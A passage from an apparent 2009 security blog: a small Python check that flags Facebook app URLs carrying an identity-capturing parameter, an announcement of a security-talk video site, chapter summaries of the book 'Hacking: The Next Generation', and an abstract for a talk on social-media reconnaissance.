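The detection half of such a client-side control is straightforward to sketch. The example URLs below are hypothetical, and a real control would of course live inside the browser as a plug-in rather than as standalone code:

```python
# Flag URLs that carry the _fb_fromhash parameter, which (as described above)
# appears on 3rd party application pages regardless of the authorization
# mechanism the application uses. Example URLs are hypothetical.
from urllib.parse import urlparse, parse_qs

def may_autocapture_identity(url: str) -> bool:
    return "_fb_fromhash" in parse_qs(urlparse(url).query)

print(may_autocapture_identity(
    "http://apps.facebook.com/someapp/?_fb_fromhash=abc123"))        # True
print(may_autocapture_identity("http://www.facebook.com/home.php"))  # False
```

A browser-side warning (for example, a Firefox plug-in) could run this check on every navigation and alert the user before the 3rd party page loads.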

Indeed, there is a clear rule of thumb pertaining to the use of online social applications: don’t put anything online that you wouldn’t want to persist in the public domain. However, this does not mean that the brands in the business of providing us social platforms can go scot-free. I sincerely hope this post has provided you some additional information on how ‘automatic authentication’ works, including its implications, in case you were not previously aware of it.

October 17, 2009

I am excited to announce that my new project (with a friend of mine who currently wishes to remain anonymous), http://securitystreams.tv/, is now live!

The goal of securitystreams.tv is to capture cutting-edge information security presentations in high quality and beautifully edited video for you to watch at your convenience.

Below is one of the presentations now available on securitystreams.tv (Bryan Sullivan's Defensive Rewriting):

For more, head on over to securitystreams.tv. We have additional videos from Billy Rios, Brett Hardin, and a few more to come (currently being edited!). You can even subscribe to the videos as a podcast (sync to your iPod, iPhone, Apple TV, xBox, etc) using our RSS feed. And stay in touch with our Twitter feed too.

Description

With the advent of rich Internet applications, the explosion of social media, and the increased use of powerful cloud computing infrastructures, a new generation of attackers has added cunning new techniques to its arsenal. For anyone involved in defending an application or a network of systems, Hacking: The Next Generation is one of the few books to identify a variety of emerging attack vectors.

You'll not only find valuable information on new hacks that attempt to exploit technical flaws, you'll also learn how attackers take advantage of individuals via social networking sites, and abuse vulnerabilities in wireless technologies and cloud infrastructures. Written by seasoned Internet security professionals, this book helps you understand the motives and psychology of hackers behind these attacks, enabling you to better prepare and defend against them.

Understand the new wave of "blended threats" that take advantage of multiple application vulnerabilities to steal corporate data

Recognize weaknesses in today's powerful cloud infrastructures and how they can be exploited

Prevent attacks against the mobile workforce and their devices containing valuable data

Be aware of attacks via social networking sites to obtain confidential information from executives and their assistants

Get case studies that show how several layers of vulnerabilities can be used to compromise multinational corporations.

[Chapter 1] Intelligence Gathering: Peering Through the Windows to Your Organization

To successfully execute an attack against any given organization, the attacker must first perform reconnaissance to gather as much intelligence about the organization as possible. In this chapter, we look at traditional attack methods as well as how the new generation of attackers is able to leverage new technologies for information gathering.

[Chapter 2] Inside-Out Attacks: The Attacker Is the Insider

Not only does the popular perimeter-based approach to security provide little risk reduction today, but it is in fact contributing to an increased attack surface that criminals are using to launch potentially devastating attacks. The impact of the attacks illustrated in this chapter can be extremely devastating to businesses that approach security with a perimeter mindset where insiders are generally trusted with information that is confidential and critical to the organization.

[Chapter 3] The Way It Works: There Is No Patch

The protocols that support network communication, which are relied upon for the Internet to work, were not specifically designed with security in mind. In this chapter, we study why these protocols are weak and how attackers have and will continue to exploit them.

[Chapter 4] Blended Threats: When Applications Exploit Each Other

The amount of software installed on a modern computer system is staggering. With so many different software packages on a single machine, managing the interactions between these software packages becomes increasingly complex. Complexity is the friend of the next-generation hacker. This chapter exposes the techniques used to pit software against software. We present the various blended threats and blended attacks so that you can gain some insight as to how these attacks are executed and the thought process behind blended exploitation.

[Chapter 5] Cloud Insecurity: Sharing the Cloud with Your Enemy

Cloud computing is seen as the next generation of computing. The benefits, cost savings, and business justifications for moving to a cloud-based environment are compelling. This chapter illustrates how next-generation hackers are positioning themselves to take advantage of and abuse cloud platforms, and includes tangible examples of vulnerabilities we have discovered in today's popular cloud platforms.

[Chapter 6] Abusing Mobile Devices: Targeting Your Mobile Workforce

Today's workforce is a mobile army, traveling to the customer and making business happen. The explosion of laptops, wireless networks, and powerful cell phones, coupled with the need to "get things done," creates a perfect storm for the next-generation attacker. This chapter walks through some scenarios showing how the mobile workforce can be a prime target of attacks.

[Chapter 7] Infiltrating the Phishing Underground: Learning from Online Criminals?

Phishers are a unique bunch. They are a nuisance to businesses and legal authorities and can cause a significant amount of damage to a person's financial reputation. In this chapter, we infiltrate and uncover this ecosystem so that we can shed some light on and advance our quest toward understanding this popular subset of the new generation of criminals.

[Chapter 8] Influencing Your Victims: Do What We Tell You, Please

The new generation of attackers doesn't want to target only networks, operating systems, and applications. These attackers also want to target the people who have access to the data they want to get a hold of. It is sometimes easier for an attacker to get what she wants by influencing and manipulating a human being than it is to invest a lot of time finding and exploiting a technical vulnerability. In this chapter, we look at the crafty techniques attackers employ to discover information about people in order to influence them.

[Chapter 9] Hacking Executives: Can Your CEO Spot a Targeted Attack?

When attackers begin to focus their attacks on specific corporate individuals, executives often become the prime target. These are the "C Team" members of the company—for instance, chief executive officers, chief financial officers, and chief operating officers. Not only are these executives in higher income brackets than other potential targets, but also the value of the information on their laptops can rival the value of information in the corporation's databases. This chapter walks through scenarios an attacker may use to target executives of large corporations.

[Chapter 10] Case Studies: Different Perspectives

This chapter presents two scenarios on how a determined hacker can cross-pollinate vulnerabilities from different processes, systems, and applications to compromise businesses and steal confidential data.

This talk will expose how voluntary and public information from new social media channels can enable you to remotely capture critical information about targeted individuals. Topics of discussion will include:

+ Hacking the Psyche: Remote behavior analysis that can be used to construct personality profiles to predict current and future psychological states of targeted individuals, including discussions on how emotional and subconscious states can be discovered even before the target is consciously aware.

+ Reconnaissance and pillage of private information, including critical data that the victim may not be aware of revealing, and that which may be impossible to protect by definition.

+ Techniques on how individuals may be remotely influenced by messaging tactics, and how criminal groups and governments may use this capability, including a case study of Twitter and the recent terror attacks in Bombay.

The goal of this presentation is to raise consciousness on how the new paradigms of social communication bring with them real risks as well as marketing and economic advantages.